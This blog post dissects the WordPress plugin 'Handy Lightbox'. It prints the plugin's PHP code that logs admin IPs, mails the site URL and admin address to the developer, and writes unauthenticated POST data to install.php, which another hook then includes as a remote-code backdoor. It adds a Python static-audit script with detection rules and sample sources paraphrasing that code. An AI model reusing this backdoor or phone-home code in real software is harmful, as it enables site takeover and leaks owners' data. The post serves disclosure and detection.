Hambach
Thomas

2014-01-22 08:09:15

The sad state of Wordpress plugins

Migrating your Wordpress website to a new host is usually a breeze. The same goes for installing plugins and themes. But what is running behind the scenes when you use these community-provided plugins and themes?

Handy Lightbox


Let us start with the first example, a plugin I had installed on this blog named "Handy Lightbox". Its behaviour is simple and straightforward: it enables the Lightbox jQuery plugin for images on your website. Everything works fine, until you take a look at the code. Here is the first issue, which only surfaced because I do not allow my webserver user to write to any directory, so the file write below fails with a warning instead of silently succeeding.
$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
$inside = "yes";
} else {
$inside = "no";
}
if ($inside == 'yes') {
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}
}

Code quality aside (the deprecated eregi(), the unchecked fopen() return values, the substring match on the IP), this appends the IP address of every visitor whose request URI contains "admin", which covers every wp-admin request, to a file called welcome.txt inside the plugin directory. Why would a lightbox plugin need a list of admin IP addresses?

Next up: on activation the plugin e-mails the developer, reporting the site URL (as the subject) and passing the admin's e-mail address as the extra headers argument of mail(), to a hard-coded address. The e-mail address has been changed by me.
/** Activate The Plugin */

function actithelightbox_activate() {
$yourip = $_SERVER['REMOTE_ADDR'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $yourip);
fclose($fp);
add_option('redirectlightbox_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Activated"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when the plugin is deactivated (the comment says "uninstall", the function is the deactivation hook).
/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Uninstalled"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
}


And I am not sure how this can be considered "outputting SEO". The function records the IP address of every logged-in user into the same welcome.txt, and then, if an install.php exists in the plugin directory, includes it, so whatever that file contains runs as PHP on the server.
function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}

}

$filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

if (file_exists($filename)) {

include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

}
}


But wait, there is more! Have a look at begin.php in his plugin, which I actually only uncovered while writing this blog post.
session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

This takes the raw POST parameter "installit", strips backslashes, runs it through an htmlentities()/html_entity_decode() round trip that is effectively a no-op, and writes the result to install.php, with no authentication or nonce check at all. Anyone who can reach begin.php can therefore upload arbitrary PHP, have it saved as install.php, and have it executed by the include in outputseo(). Since the plugin author is mailed the URL of every installation, they can easily abuse this script. So can anyone else who knows about the issues this plugin has.
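A static check for the three patterns shown in this post (the IP log written from the plugin directory, the phone-home mail(), and the begin.php/install.php write-then-include), as an added example in Python that is not code from the plugin or from this post's author. It scans PHP source text with regular expressions and a simple per-file taint set, and cross-checks which paths the plugin writes against which paths it includes. The sample sources embedded at the bottom are constructed to paraphrase the snippets above; the recipient address plugin-author@example.com, the file names, the rule names, the Finding type and audit_plugin() are all this example's own.

```python
"""Static audit for the plugin behaviours shown in this post (an added example,
not the plugin's or the author's code). One rule per indicator discussed above:
  phone-home          mail() to a hard-coded recipient
  deprecated-regex    ereg()/eregi()
  tainted-write       $_POST/$_GET/$_REQUEST/$_COOKIE data reaching fwrite()
  write-then-include  a path one file opens for writing and any file includes
Taint tracking is line-based and deliberately simple: one statement per line,
a variable assigned from request data stays tainted until reassigned."""
import re
from dataclasses import dataclass

REQUEST_DATA = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
MAIL_CALL = re.compile(r"\bmail\s*\(\s*(['\"])([^'\"]+@[^'\"]+)\1")
EREG_CALL = re.compile(r"\beregi?\s*\(")
FOPEN_WRITE = re.compile(r"(\$\w+)\s*=\s*fopen\s*\(\s*([^,]+?)\s*,\s*['\"][wa]\+?['\"]\s*\)")
FWRITE = re.compile(r"\bfwrite\s*\(\s*(\$\w+)\s*,\s*([^)]+)\)")
INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b\s*\(?\s*([^;]+?)\s*\)?\s*;")
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*([^;]+);")


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    rule: str
    detail: str


def _norm(expr):
    """Make the same PHP path expression compare equal across files:
    drop whitespace and outer parentheses, unify the quote style."""
    expr = re.sub(r"\s+", "", expr)
    while expr.startswith("(") and expr.endswith(")"):
        expr = expr[1:-1]
    return expr.replace('"', "'")


def _is_tainted(expr, tainted):
    """True if the expression reads request data or a tainted variable."""
    return bool(REQUEST_DATA.search(expr)) or any(
        re.search(re.escape(v) + r"\b", expr) for v in tainted)


def audit_plugin(files):
    """files: {filename: php_source}. Returns findings sorted by file and line."""
    findings, written, includes = [], set(), []
    for name, src in files.items():
        tainted, handles = set(), {}  # tainted variables; $fp -> path opened for writing
        for ln, line in enumerate(src.splitlines(), 1):
            if m := MAIL_CALL.search(line):
                findings.append(Finding(name, ln, "phone-home",
                                        f"mail() to hard-coded address {m.group(2)}"))
            if EREG_CALL.search(line):
                findings.append(Finding(name, ln, "deprecated-regex",
                                        "ereg()/eregi() deprecated since PHP 5.3, removed in 7"))
            if m := FOPEN_WRITE.search(line):
                handles[m.group(1)] = _norm(m.group(2))
                written.add(_norm(m.group(2)))
            if m := ASSIGN.search(line):
                lhs, rhs = m.groups()
                if _is_tainted(rhs, tainted):
                    tainted.add(lhs)
                else:
                    tainted.discard(lhs)
            for m in FWRITE.finditer(line):
                if _is_tainted(m.group(2), tainted):
                    target = handles.get(m.group(1), "<unknown handle>")
                    findings.append(Finding(name, ln, "tainted-write",
                                            f"request data written to {target}"))
            for m in INCLUDE.finditer(line):
                includes.append((name, ln, _norm(m.group(1))))
    # Cross-file step: a file the plugin both writes and includes is a dropper.
    for name, ln, path in includes:
        if path in written:
            findings.append(Finding(name, ln, "write-then-include",
                                    f"includes {path}, which the plugin itself writes"))
    return sorted(findings, key=lambda f: (f.file, f.line))


# Constructed sample sources paraphrasing the shapes in the post (not the plugin's code).
SAMPLE_PLUGIN = {
    "handy-lightbox.php": """<?php
function actithelightbox_activate() {
    $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
    fwrite($fp, $_SERVER['REMOTE_ADDR']);
    mail("plugin-author@example.com", get_option('siteurl'), "Plugin Activated", get_option('admin_email'));
}
function outputseo() {
    if (eregi("admin", $_SERVER["REQUEST_URI"])) { $inside = "yes"; }
    include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');
}
""",
    "begin.php": """<?php
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
""",
}

if __name__ == "__main__":
    for f in audit_plugin(SAMPLE_PLUGIN):
        print(f"{f.file}:{f.line} [{f.rule}] {f.detail}")
```

To run it over a real plugin directory, build the dict from os.walk over the *.php files. It is a triage aid, not a proof: it only knows the shapes shown here, it misses writes whose path it cannot resolve, and it treats $_SERVER values such as REQUEST_URI as clean; the welcome.txt write above is reported only through the path it opens, since the IP it stores is not request-parameter data.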

I have contacted the developer, but I do not expect much of a reply.
